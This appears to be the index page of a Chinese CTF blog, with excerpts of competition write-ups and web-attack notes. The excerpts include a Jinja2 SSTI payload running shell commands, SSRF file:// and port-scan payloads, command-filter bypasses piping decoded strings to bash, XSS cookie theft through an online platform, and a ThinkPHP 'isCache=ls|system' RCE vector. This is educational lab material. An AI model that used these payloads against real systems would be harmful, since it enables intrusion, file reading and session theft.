梦~醒🍇

2024年春秋杯网络安全联赛冬季赛wp-1.17

发表于 2025-01-17 | 更新于 2025-02-19 | CTF | 比赛wp

[TOC] web easy_flask 考点：ssti 注入打开网页，发现有个登录，试试直接登录看到 url 处是进行 get 传参，试试 111 联想到 ssti 漏洞，于是用9验证一下，发现就是 ssti 模板注入进行 ssti 模板注入漏洞一系列，构造 payload: 1{{cycler.next.__globals__.__builtins__.__import__('os').popen('cat flag').read()}} flag{48ad0cde8345c8b2608933ac4e85147e} file_copy 考点：无回显，filter协议根据代码，可以看到是post传参，参数是path。（抓包也可以看）直接使用脚本（https://github.com/ProbiusOfficial/PHPinclude-labs/tree/bbb08b030623d481be51edea063433b8d77b2ee7/Level 17/php_filte ...

CTFHub技能树-SSRF

发表于 2024-12-02 | 更新于 2025-10-29 | CTF | web-wp

[TOC] 内网访问根据提示和url处可知，要访问本地的flag.php文件使用http协议 1http://127.0.0.1/flag.php ctfhub{3a8065a8c91c9f5c801ea8f8} 伪协议读取文件根据提示可知，文件是在web目录下，使用伪协议 web目录一般是/var/www/html 1file:///var/www/html/flag.php ctfhub{f43a8521d7cdb6dec67225e6} 端口扫描根据提示知道，端口范围是8000-9000 使用dict协议，然后抓包爆破端口可以看到端口应该是8137，使用http访问 1url=http://127.0.0.1:8137 ctfhub{f0f29c3e738e6fc924ca1e67} POST请求先直接访问flag.php 1url=127.0.0.1/flag.php 得到一个输入框，查看源码，发现key 提交key出现页面我们尝试通过file协议读取index.php 和flag.php的页面源码 12?url=file:///var ...

ctfshow萌新web

发表于 2024-12-01 | 更新于 2025-10-29 | CTF | web-wp

来源：ctfshow [TOC] web1 考点：inval()函数漏洞，sql注入 1234567891011121314151617181920212223242526272829303132333435363738394041<html><head> <title>ctf.show萌新计划web1</title> <meta charset="utf-8"></head><body><?php# 包含数据库连接文件include("config.php");# 判断get提交的参数id是否存在if(isset($_GET['id'])){ $id = $_GET['id']; # 判断id的值是否大于999 if(intval($id) > 999){ # id 大于 999 直接退出并返回错误 die("id ...

命令执行过滤关键字

发表于 2024-11-30 | 更新于 2024-12-02 | CTF | web姿势

过滤关键字反斜杠绕过 ca\t y1n\g.php 两个单引号绕过 cat y1''ng.php base64编码绕过 echo “base64编码” | base64 -d | bash hex编码绕过 echo "hex编码" | xxd -r -p | bash 用[ ]进行匹配 cat y1[n]g.php 用* 匹配任意 cat y1n* 用?匹配任意 cat y1n? 用{ }匹配范围 cat y1{a..z}g.php 变量 $a=fl;$b=ag;cat $a$b.php 拼接绕过 ‘fl’.'ag' 括号绕过 (sy.(st).em)(ls); 除了上述方式，还可以用字符串拼接的方式绕过。 python字符串拼接: 1.+ eg: ‘a’+‘b’ 输出:‘ab’ 2.贴贴 eg: ‘a’‘b’ 输出:‘ab’ PHP拼接: . eg: ‘a’.‘b’ 输出:‘ab’ 解释内联执行：将前一个执行结果作为后一个执行的参数。过滤所有字母和数字: 1.位运算-异或（见脚 ...

HUBU新星杯wp

发表于 2024-11-30 | 更新于 2025-02-19 | CTF | 比赛wp

[TOC] web Robots Leak 考点：git泄露开启题目先扫目录 git泄露，直接拉取git到本地，然后有个.git文件进入到文件里，查看日志找到关键词flag，查看一下内容拿到一半flag。查看一下其他日志内容，都没什么营养，然后看看有没有文件，用git stash pop 发现拉取了一个.flag.exe，查看得到下一半合起来就是全部flag HUBUCTF{431332b1-e91f-4437-9036-b9059539886f} ez-http 考点：http基础 http基础，按要求一步一步来，建议抓包放进重放器里面，方便剩下的就是改referrer，添加一个ip(网上搜一下，多试)，然后改cookie等等。（不截图了） Random_Door 考点：python脚本，php伪协议打开网站嗯，好，满天星，写个脚本挨着读 1234567891011121314151617181920212223import requestsimport timebase_url = ...

HUBUCTF-2022-新生赛-wp

发表于 2024-11-29 | 更新于 2024-12-02 | CTF | 比赛wp

checkin 考点：反序列化，弱比较，php 123456789101112131415<?phpshow_source(__FILE__);$username = "this_is_secret"; $password = "this_is_not_known_to_you"; include("flag.php");//here I changed those two $info = isset($_GET['info'])? $_GET['info']: "" ;$data_unserialize = unserialize($info);if ($data_unserialize['username']==$username&&$data_unserialize['password']==$password){ echo $flag;}else{ ...

XSS在线平台使用

发表于 2024-11-28 | 更新于 2024-12-02 | CTF | 其他姿势

前言：由于自己搭建的xss平台需要服务器才能获取其他网络的cookie，所以无法接收赛题的cookie，最简便的方法还是使用在线平台，虽然可能有一定风险，以后买服务器了再搭建自己的吧登录后，直接创建项目就行传入的地址如下：然后就能在平台上接受到了

CTFHub技能树-XSS

发表于 2024-11-28 | 更新于 2025-02-02 | CTF | web-wp

反射型打开网站反射型，直接使用xss平台，将生成的地址传入第一个空然后将url代码传入第二个空就行 flag=ctfhub{a51bb55f89d068a011466d62} 存储型打开网站，依然像上面的步骤一样。区别于前面反射型xss的是，他建立恶意连接是在于每一次都要发送含恶意代码，而这个存储xss不需要，一旦发送过一次，以后每次访问它时，都会含有恶意代码 flag=ctfhub{1cef0cbbc0bb33244d4a5c76} DOM反射查看源码位置需要闭合前面的 ’ ，所以只需要在xss注入时前面加上’; ，然后把后面的’;注释掉。由于前面没有东西了，所以 1</script><script src= > 其余步骤一样 flag=ctfhub{aebf8f6244f0ad340612cc6e} 过滤空格步骤一样，空格可以用[/]或者/**/代替 flag=ctfhub{9830f9e82cfbc1e77a1d0dae} 过滤关键词先用探针试试 1<script>alert(/xss/)</ ...

mb_strpos与mb_substr错位索引

发表于 2024-11-26 | 更新于 2024-12-02 | CTF | web姿势

mb_strpos与mb_substr错位索引 1234567891011121314152. mb_substr和mb_strpos函数漏洞mb_strpos() 和 mb_substr() 是 PHP 中用于处理多字节字符的函数，专门用于处理 UTF-8 或其他多字节编码的字符串。(1)mb_strpos: 用于查找一个字符串在另一个字符串中第一次出现的位置（索引），返回结果是该子字符串第一次出现的位置（索引）。mb_strpos(string $haystack, string $needle, int $offset = 0, string $encoding = null): int|false $haystack：要在其中搜索子字符串的源字符串。 $needle：要搜索的子字符串。 $offset（可选）：从哪个位置开始搜索，默认为 0。 $encoding（可选）：要使用的字符编码，默认为内部字符编码。(2)mb_substr: 用于获取一个字符串的子串，返回结果是指定位置和长度的子字符串。mb_substr(string $string, int ...

随机数种子爆破

发表于 2024-11-26 | 更新于 2025-02-09 | CTF | web姿势

在PHP中，变量以$符号开头，后面拼接变量名。上述代码的基本含义是:从$str变量中随机取32次字符(字符可重复)，并拼接成字符串，最后将该字符串赋值给变量$password。执行代码后会输出 $password变量的前10个字节，此时通过POST请求传递password参数到服务端，如果password参数的值与$password变量的值完全相等，那么就会输出flag。理论上，如果选取字符的时候是完全随机的，那么几乎不可能出现 password参数值与$password变量值相等的情况(概率极低)。但由于代码中使用mt_rand()函数来生成随机数，因此如果可以得知该函数生成的一段随机数序列，就可以通过工具爆破出其选取的随机数种子 (该种子由$_Session[‘seed’]变量生成)，从而预测之后的所有随机数序列。在这里，我们使用php_mt_seed工具来爆破随机数种子。该工具的下载地址为:https://www.openwall.com/php_mt_seed/php_mt_seed- 4.0.tar.gz 访问题目页面，可得到前10个字节的随机字符，将输 ...

tp漏洞

发表于 2024-11-25 | 更新于 2025-02-09 | CTF | web姿势

一-识别tp框架(指纹) 1.1 ioc判断 /favicon.ico 1.2报错或者 /index.php/index/index/1 1.3错误传参 1.4特殊指纹出现logo /?c=4e5e5d7364f443e28fbf0d3ae744a59a /4e5e5d7364f443e28fbf0d3ae744a59a p3.1和3.2版本 4e5e5d7364f443e28fbf0d3ae744a59a-index.html 1.5 body特征 body里有"十年磨一剑" 或者"ThinkPHP" 1.6插件二、利用方法数据通过竖线分开, 前面为参数, 后面为函数。例如： 12/?cacheTime=0&isCache=ls|system /index.php/?cacheTime=0&isCache=ls|system #上面不行就换下面根据 thinkphp 的路由规则： 12345由于ThinkPHP存在两种路由规则，如下所示http://serverName/index.php/模块/控 ...

docker保存和打包镜像

发表于 2024-11-24 | 更新于 2024-12-02 | CTF | 其他姿势

docker保存和打包镜像作用：在现在容器镜像上保存镜像进行打包，在另一台服务上使用；或现有的容器安装了一些库，配置了开发环境，需要保存下载，下次加载后直接使用。 1.1 首先查看下现有容器镜像（目的是查询需要保存镜像的ID） 1docker ps -a 1.2 接下来用commit参数进行保存镜像（精简版） 1docker commit 7ca736d99653 yolov5:v6.2 其中，7ca736d99653 是需要保存镜像的ID，刚才用docker ps -a 查询到的。打包tar 使用save参数进行打包，格式如：docker save -o tar文件名称镜像REPOSITORY:TAG 1docker save -o yolov5-v6.2.tar yolov5:v6.2 其中yolov5:v6.2 是需要保存镜像的REPOSITORY、和TAG；也是上面保存的镜像名称。